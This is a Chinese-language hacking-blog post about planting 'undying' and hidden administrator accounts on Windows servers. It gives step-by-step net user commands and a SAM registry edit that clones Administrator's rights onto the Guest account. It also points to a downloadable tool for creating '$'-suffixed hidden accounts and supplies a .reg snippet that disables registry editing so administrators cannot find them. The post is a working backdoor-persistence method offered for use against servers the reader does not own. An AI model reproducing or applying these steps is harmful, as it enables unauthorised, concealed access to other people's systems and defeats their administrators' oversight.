服务器打造不死账号与隐藏账号方法总结

<!--NoThumbnail-->
一、通过注册表克隆帐户(建立3389下的隐藏账号)
然后发现服务器没有Guest账号的话那么我们创建一个一般情况下服务器都有的如果没有通过以下方法创建一个。
1、创建一个新的帐户guest,使用命令:net user guset 密码 /add
如果服务器有这个账号但是管理员给禁止了那么就需要启动
启动Guest账号m使用命令:net user guest /active:yes

2、然后运行regedt32.exe,依次展开子键HKEY_LOCAL_MACHINESAMSAM,右击选择“权限”项。
在出现的“SAM 权限”对话窗口中,点击“添加”将登录时的帐户添加到“组或用户名称”列
(这里我是使用administrator登陆的那么就将administrator帐户添加到“组或用户名称”列)
点击应用-确定以后然后重新再打开注册表就可以发现多出来2个键值了
2、右键然后导出
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames000001F4
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest
(名字随意)退出。
4、然后将超级用户Administrator对应的项000001F4下的键“F”的值复制,并粘贴在Guest对应的项000003F1下的键“F”的值
PS:展开子键:HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesGuest,在其右侧窗口中发现其默认值为0x3F1
那么就需要粘贴的地方就是HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000003F1对应的F键值了
到此现在Guset的隐藏账号就建立好了 打开regedt32.exe,把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子。
注意:
优点:隐藏的超级用户建好后,我们使用隐藏账号登陆上去再任务管理器的用户里面看到的将是Administrator账号也就是系统管理员的账号,且管理员修改了系统管理员的账号密码后也不影响我们用隐藏账号
缺点:管理员禁用了Guset或者删除了Guser账号 或者修改了他的密码 (一般情况下Guser账号是系统自带的 管理员一般不会XXOO吧?不过看到这篇文字的服务器管理员知道应该怎么做了吧?
二、使用工具打造不死账号
使用方法:输入账号 密码 然后直接点击创建
设置的账号最好已$结尾这样在用户组和DOS命令行下都看到账号了,只能在注册表中查看的到
解决方法:我们可以锁定注册表

REGEDIT4 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"DisableRegistryTools"=dword:00000001
REGEDIT4 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"DisableRegistryTools"=dword:00000001

将以上代码复制下来然后保存为x.reg 然后再运行导入即可
这款工具其实就是使用的克隆账号的方法,只是做成了工具原理都是一样的
隐藏账户.rar
[解压密码:www.exehack.net]

最后修改:
赞赏支持
最大的开心,莫过于你请我吃辣条

发表评论